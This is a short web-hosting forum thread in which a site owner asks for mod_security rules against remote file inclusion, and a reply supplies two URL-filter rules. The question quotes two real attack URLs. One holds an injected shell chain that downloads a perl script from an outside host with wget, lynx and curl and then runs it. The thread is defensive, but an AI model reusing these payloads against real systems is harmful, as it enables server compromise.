Community Forums
Connect with us on LinkedIn
+ Reply to Thread
Results 1 to 2 of 2
  1. #1
    Member
    Join Date
    Feb 2003
    Posts
    252

    Default Mod_security Rule Assistance - Prevent SPAM

    Hello,

    Does anyone have a mod_security rule that will block these types of exploits.....?

    http://www.domain.com/index.php?d=http://att4ck3d.xpg.com.br/cmd.txt?&action=cmd&chdir=/tmp

    http://www.domain.com/index.php?d=http://teampcc10.ooblez.com/tool25.txt?&cmd=cd%20/tmp%20;%20killall%20-9%20perl%20;%20killall%20-9%20perl5.8.8%20;%20wget%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20lynx%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20curl%20-o%20sess_0101.txt%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20perl%20sess_0101.txt

    A rule that would prevent people from loading a file from an external URL would be great.

    Thanks,
    MIke

  2. #2
    Member
    Join Date
    May 2002
    Posts
    429

    Default

    SecFilterSelective REQUEST_URI "index.php\?id=(http|ftp|https)\:/"
    SecFilterSelective REQUEST_URI "=(http|ftp|ftps|https)\:/"

Similar Threads & Tags
Similar threads

  1. problem with the RBL rule in Mod_security
    By nitaish in forum cPanel and WHM Discussions
    Replies: 1
    Last Post: 06-18-2009, 11:29 AM
  2. mod_security 2.1.4 and the latest rule set (1.5.1)
    By DReade83 in forum cPanel and WHM Discussions
    Replies: 1
    Last Post: 12-19-2007, 12:49 PM
  3. Add Rule to Mod_security useragents.conf ?
    By Fernis in forum cPanel and WHM Discussions
    Replies: 0
    Last Post: 06-02-2007, 12:27 PM
  4. mod_security rule
    By ramakant in forum New User Questions
    Replies: 4
    Last Post: 12-09-2005, 01:55 AM
Linkedin       Facebook       Twitter       RSS       Flickr       YouTube